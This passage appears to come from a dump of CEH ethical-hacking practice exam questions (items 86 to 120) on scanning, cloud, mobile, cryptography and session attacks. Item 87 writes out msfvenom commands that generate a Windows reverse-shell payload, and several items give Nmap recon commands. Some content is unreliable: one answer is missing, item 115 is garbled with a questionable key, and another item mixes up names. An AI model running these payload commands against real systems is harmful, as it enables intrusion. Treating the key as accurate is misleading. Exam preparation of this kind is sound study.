A. 22
B. 48101
C. 80
D. 443
Correct Answer: B

87.What is the correct way of using MSFvenom to generate a reverse TCP shellcode
for Windows?
A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe
> shell.exe
D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe
> shell.exe
Correct Answer: C

88.Samuel, a security administrator, is assessing the configuration of a web

server. He noticed that the server permits SSLv2 connections, and the same private
key certificate is used on a different server that allows SSLv2 connections. This
vulnerability makes the web server vulnerable to attacks as the SSLv2 server can
leak key information. Which of the following attacks can be performed by exploiting
the above vulnerability?
A. Padding oracle attack
B. DROWN attack
C. DUHK attack
D. Side-channel attack
Correct Answer: B

89.Techno Security Inc. recently hired John as a penetration tester. He was tasked
with identifying open ports in the target network and determining whether the ports
are online and any firewall rule sets are encountered. John decided to perform a
TCP SYN ping scan on the target network. Which of the following Nmap commands must
John use to perform the TCP SYN ping scan?
A. nmap -sn -PO < target IP address >
B. nmap -sn -PS < target IP address >
C. nmap -sn -PA < target IP address >
D. nmap -sn -PP < target IP address >
Correct Answer: B

90.Alice, a professional hacker, targeted an organization's cloud services. She

infiltrated the target's MSP provider by sending spear-phishing emails and
distributed custom-made malware to compromise user accounts and gain remote access
to the cloud service. Further, she accessed the target customer profiles with her
MSP account, compressed the customer data, and stored them in the MSP. Then, she
used this information to launch further attacks on the target organization. Which
of the following cloud attacks did Alice perform in the above scenario?
A. Cloud cryptojacking
B. Man-in-the-cloud (MITC) attack
C. Cloud hopper attack
D. Cloudborne attack
Correct Answer: C

91.John, a professional hacker, targeted an organization that uses LDAP for

accessing distributed directory services. He used an automated tool to anonymously
query the LDAP service for sensitive information such as usernames, addresses,
departmental details, and server names to launch further attacks on the target
organization. What is the tool employed by John to gather information from the LDAP
service?
A. ike-scan
B. Zabasearch
C. JXplorer
D. EarthExplorer
Correct Answer: C

92.Johnson, an attacker, performed online research for the contact details of

reputed cybersecurity firms. He found the contact number of sibertech.org and
dialed the number, claiming himself to represent a technical support team from a
vendor. He warned that a specific server is about to be compromised and requested
sibertech.org to follow the provided instructions. Consequently, he prompted the
victim to execute unusual commands and install malicious files, which were then
used to collect and pass critical information to Johnson's machine. What is the
social engineering technique Steve employed in the above scenario?
A. Diversion theft
B. Quid pro quo
C. Elicitation
D. Phishing
Correct Answer: B

93.To create a botnet, the attacker can use several techniques to scan vulnerable
machines. The attacker first collects information about a large number of
vulnerable machines to create a list. Subsequently, they infect the machines. The
list is divided by assigning half of the list to the newly compromised machines.
The scanning process runs simultaneously. This technique ensures the spreading and
installation of malicious code in little time. Which technique is discussed here?
A. Subnet scanning technique
B. Permutation scanning technique
C. Hit-list scanning technique
D. Topological scanning technique
Correct Answer: C

94.Louis, a professional hacker, had used specialized tools or search engines to

encrypt all his browsing activity and navigate anonymously to obtain
sensitive/hidden information about official government or federal databases. After
gathering the information, he successfully performed an attack on the target
government organization without being traced. Which of the following techniques is
described in the above scenario?
A. Website footprinting
B. Dark web footprinting
C. VPN footprinting
D. VoIP footprinting
Correct Answer: B

95.An organization is performing a vulnerability assessment for mitigating threats.

James, a pen tester, scanned the organization by building an inventory of the
protocols found on the organization's machines to detect which ports are attached
to services such as an email server, a web server, or a database server. After
identifying the services, he selected the vulnerabilities on each machine and
started executing only the relevant tests. What is the type of vulnerability
assessment solution that James employed in the above scenario?
A. Service-based solutions
B. Product-based solutions
C. Tree-based assessment
D. Inference-based assessment
Correct Answer: D

96.Dorian is sending a digitally signed email to Poly. With which key is Dorian
signing this message and how is Poly validating it?
A. Dorian is signing the message with his public key, and Poly will verify that the
message came from Dorian by using Dorian's private key.
B. Dorian is signing the message with Poly's private key, and Poly will verify that
the message came from Dorian by using Dorian's public key.
C. Dorian is signing the message with his private key, and Poly will verify that
the message came from Dorian by using Dorian's public key.
D. Dorian is signing the message with Poly's public key, and Poly will verify that
the message came from Dorian by using Dorian's public key.
Correct Answer: C

97.At what stage of the cyber kill chain theory model does data exfiltration occur?
A. Weaponization
B. Actions on objectives
C. Command and control
D. Installation
Correct Answer: B
98.Heather's company has decided to use a new customer relationship management
tool. After performing the appropriate research, they decided to purchase a
subscription to a cloud-hosted solution. The only administrative task that Heather
will need to perform is the management of user accounts. The provider will take
care of the hardware, operating system, and software administration including
patching and monitoring. Which of the following is this type of solution?
A. Iaas
B. Saas
C. PaaS
D. Caas
Correct Answer: B

99.Infecting a system with malware and using phishing to gain credentials to a

system or web application are examples of which phase of the ethical hacking
methodology?
A. Scanning
B. Gaining access
C. Maintaining access
D. Reconnaissance
Correct Answer: B

100.Mr. Omkar performed tool-based vulnerability assessment and found two

vulnerabilities. During analysis, he found that these issues are not true
vulnerabilities. What will you call these issues?
A. False positives
B. True negatives
C. True positives
D. False negatives
Correct Answer: A

101.Which file is a rich target to discover the structure of a website during web-
server footprinting?
A. domain.txt
B. Robots.txt
C. Document root
D. index.html
Correct Answer: B

102.Andrew is an Ethical Hacker who was assigned the task of discovering all the
active devices hidden by a restrictive firewall in the IPv4 range in a given target
network. Which of the following host discovery techniques must he use to perform
the given task?
A. UDP scan
B. ARP ping scan
C. ACK flag probe scan
D. TCP Maimon scan
Correct Answer:

103.An organization has automated the operation of critical infrastructure from a

remote location. For this purpose, all the industrial control systems are connected
to the Internet. To empower the manufacturing process, ensure the reliability of
industrial networks, and reduce downtime and service disruption, the organization
decided to install an OT security tool that further protects against security
incidents such as cyber espionage, zero-day attacks, and malware. Which of the
following tools must the organization employ to protect its critical
infrastructure?
A. Robotium
B. BalenaCloud
C. Flowmon
D. IntentFuzzer
Correct Answer: C
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
A.Robotium -->> Android
B.BalenaCloud -->> Clouid provider
C.Flowmon -->> rather that, OT thing--------->>>>>>>>>Flowmon empowers
manufacturers and utility companies to ensure the reliability of their industrial
networks confidently to avoid downtime and disruption of service continuity. This
can be achieved by continuous monitoring and anomaly detection so that
malfunctioning devices or security incidents, such as cyber espionage, zero-days,
or malware, can be reported and remedied as quickly as possible.
D.IntentFuzzer -->> Android

104.Bella, a security professional working at an IT firm, finds that a security

breach has occurred while transferring important files. Sensitive data, employee
usernames, and passwords are shared in plaintext, paving the way for hackers to
perform successful session hijacking. To address this situation, Bella implemented
a protocol that sends data using encryption and digital certificates. Which of the
following protocols is used by Bella?
A. FTPS
B. FTP
C. HTTPS
D. IP
Correct Answer: A
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Approaches Causing Vulnerability to Session Hijacking and their Preventative
Solutions FTP, use FTPS.
Implementing these protocols reduces the chance of a successful hijack by sending
data using encryption and digital certificates.

105.Kevin, a professional hacker, wants to penetrate CyberTech Inc's network. He

employed a technique, using which he encoded packets with Unicode characters. The
company's IDS cannot recognize the packets, but the target web server can decode
them. What is the technique used by Kevin to evade the IDS system?
A. Session splicing
B. Urgency flag
C. Obfuscating
D. Desynchronization
Correct Answer: C

106.Jim, a professional hacker, targeted an organization that is operating critical

industrial infrastructure. Jim used Nmap to scan open ports and running services on
systems connected to the organization's OT network. He used an Nmap command to
identify Ethernet/IP devices connected to the Internet and further gathered
information such as the vendor name, product code and name, device name, and IP
address. Which of the following Nmap commands helped Jim retrieve the required
information?
A. nmap -Pn -sT --scan-delay 1s --max-parallelism 1 -p < Port List > < Target IP >
B. nmap -Pn -sU -p 44818 --script enip-info < Target IP >
C. nmap -Pn -sT -p 46824 < Target IP >
D. nmap -Pn -sT -p 102 --script s7-info < Target IP >
Correct Answer: B

107.In this form of encryption algorithm, every individual block contains 64-bit
data, and three keys are used, where each key consists of 56 bits. Which is this
encryption algorithm?
A. IDEA
B. Triple Data Encryption Standard
C. AES
D. MD5 encryption algorithm
Correct Answer: B

108.Sam is a penetration tester hired by Inception Tech, a security organization.

He was asked to perform port scanning on a target host in the network. While
performing the given task, Sam sends FIN/ACK probes and determines that an RST
packet is sent in response by the target host, indicating that the port is closed.
What is the port scanning technique used by Sam to discover open ports?
A. Xmas scan
B. IDLE/IPID header scan
C. TCP Maimon scan
D. ACK flag probe scan
Correct Answer: C

109.Gerard, a disgruntled ex-employee of Sunglass IT Solutions, targets this

organization to perform sophisticated attacks and bring down its reputation in the
market. To launch the attacks process, he performed DNS footprinting to gather
information about DNS servers and to identify the hosts connected in the target
network. He used an automated tool that can retrieve information about DNS zone
data including DNS domain names, computer names, IP addresses, DNS records, and
network Whois records. He further exploited this information to launch other
sophisticated attacks. What is the tool employed by Gerard in the above scenario?
A. Towelroot
B. Knative
C. zANTI
D. Bluto
Correct Answer: D

110.Steven connected his iPhone to a public computer that had been infected by
Clark, an attacker. After establishing the connection with the public computer,
Steven enabled iTunes Wi-Fi sync on the computer so that the device could continue
communication with that computer even after being physically disconnected. Now,
Clark gains access to Steven's iPhone through the infected computer and is able to
monitor and read all of Steven's activity on the iPhone, even after the device is
out of the communication zone. Which of the following attacks is performed by Clark
in the above scenario?
A. Man-in-the-disk attack
B. iOS jailbreaking
C. iOS trustjacking
D. Exploiting SS7 vulnerability
Correct Answer: C

111.John, a professional hacker, decided to use DNS to perform data exfiltration on

a target network. In this process, he embedded malicious data into the DNS protocol
packets that even DNSSEC cannot detect. Using this technique, John successfully
injected malware to bypass a firewall and maintained communication with the victim
machine and C&C server. What is the technique employed by John to bypass the
firewall?
A. DNSSEC zone walking
B. DNS cache snooping
C. DNS enumeration
D. DNS tunneling method
Correct Answer: D

112.Abel, a cloud architect, uses container technology to deploy

applications/software including all its dependencies, such as libraries and
configuration files, binaries, and other resources that run independently from
other processes in the cloud environment. For the containerization of applications,
he follows the five-tier container technology architecture. Currently, Abel is
verifying and validating image contents, signing images, and sending them to the
registries. Which of the following tiers of the container technology architecture
is Abel currently working in?
A. Tier-1: Developer machines
B. Tier-2: Testing and accreditation systems
C. Tier-3: Registries
D. Tier-4: Orchestrators
Correct Answer: B

113.Taylor, a security professional, uses a tool to monitor her company's website,

analyze the website's traffic, and track the geographical location of the users
visiting the company's website. Which of the following tools did Taylor employ in
the above scenario?
A. Webroot
B. Web-Stat
C. WebSite-Watcher
D. WAFW00F
Correct Answer: B

114.Attacker Rony installed a rogue access point within an organization's perimeter

and attempted to intrude into its internal network. Johnson, a security auditor,
identified some unusual traffic in the internal network that is aimed at cracking
the authentication mechanism. He immediately turned off the targeted network and
tested for any weak and outdated security mechanisms that are open to attack. What
is the type of vulnerability assessment performed by Johnson in the above scenario?
A. Wireless network assessment
B. Application assessment
C. Host-based assessment
D. Distributed assessment
Correct Answer: A

115.You start performing a penetration test against a specific website and have
decided to start from grabbing all the links from the main page. What is the best
Linux pipe to achieve your milestone?
A. wget https://site.com | grep ‫ג‬€<a href=\‫ג‬€http‫ג‬€ | grep ‫ג‬€site.com‫ג‬€
B. curl -s https://site.com | grep ‫ג‬€<a href=\‫ג‬€http‫ג‬€ | grep ‫ג‬€site.com‫ג‬€ | cut -d
‫ג‬€‫\ג‬€‫ג‬€ -f 2
C. dirb https://site.com | grep ‫ג‬€site‫ג‬€
D. wget https://site.com | cut -d ‫ג‬€http‫ג‬€
Correct Answer: A

116.Joe works as an IT administrator in an organization and has recently set up a

cloud computing service for the organization. To implement this service, he reached
out to a telecom company for providing Internet connectivity and transport services
between the organization and the cloud service provider. In the NIST cloud
deployment reference architecture, under which category does the telecom company
fall in the above scenario?
A. Cloud consumer
B. Cloud broker
C. Cloud auditor
D. Cloud carrier
Correct Answer: D

117.Don, a student, came across a gaming app in a third-party app store and
installed it. Subsequently, all the legitimate apps in his smartphone were replaced
by deceptive applications that appeared legitimate. He also received many
advertisements on his smartphone after installing the app. What is the attack
performed on Don in the above scenario?
A. SIM card attack
B. Clickjacking
C. SMS phishing attack
D. Agent Smith attack
Correct Answer: D
Explanetion:-----------------------------------------------------------------------
--------------------------------------------------------------------
Agent Smith attacks are carried out by luring victims into downloading and
installing malicious apps designed and published by attackers in the form of games,
photo editors, or other attractive tools from third-party app stores such as 9Apps.
Once the user has installed the app, the core malicious code inside the application
infects or replaces the legitimate apps in the victim’s mobile device C&C commands.
The deceptive application replaces legitimate apps such as WhatsApp, SHAREit, and
MX Player with similar infected versions.
The application sometimes also appears to be an authentic Google product such as
Google Updater or Themes.
The attacker then produces a massive volume of irrelevant and fraudulent
advertisements on the victim’s device through the infected app for financial gain.
Attackers exploit these apps to steal critical information such as personal
information, credentials, and bank details, from the victim’s mobile device through
C&C commands

118.This form of encryption algorithm is a symmetric key block cipher that is

characterized by a 128-bit block size, and its key size can be up to 256 bits.
Which among the following is this encryption algorithm?
A. HMAC encryption algorithm
B. Twofish encryption algorithm
C. IDEA
D. Blowfish encryption algorithm
Correct Answer: B

119.A DDoS attack is performed at layer 7 to take down web infrastructure. Partial
HTTP requests are sent to the web infrastructure or applications. Upon receiving a
partial request, the target servers opens multiple connections and keeps waiting
for the requests to complete. Which attack is being described here?
A. Desynchronization
B. Slowloris attack
C. Session splicing
D. Phlashing
Correct Answer: B

120.Boney, a professional hacker, targets an organization for financial benefits.

He performs an attack by sending his session ID using an MITM attack technique.
Boney first obtains a valid session ID by logging into a service and later feeds
the same session ID to the target employee. The session ID links the target
employee to Boney's account page without disclosing any information to the victim.
When the target employee clicks on the link, all the sensitive payment details
entered in a form are linked to Boney's account. What is the attack performed by
Boney in the above scenario?
A. Forbidden attack
B. CRIME attack
C. Session donation attack
D. Session fixation attack
Correct Answer: C
Explanetion:-----------------------------------------------------------------------
--------------------------------------------------------------------
In a session donation attack, the attacker donates their own session ID to the
target user. In this attack, the attacker first obtains a valid session ID by
logging into a service and later feeds the same session ID to the target user. This
session ID links a target user to the attacker’s account page without disclosing
any information to the victim. When the target user clicks on the link and enters
the details (username, password, payment details, etc.) in a form, the entered
details are linked to the attacker’s account. To initiate this attack, the attacker
can send their session ID using techniques such as cross-site cooking, an MITM
attack, and session fixation. A session donation attack involves the following
steps.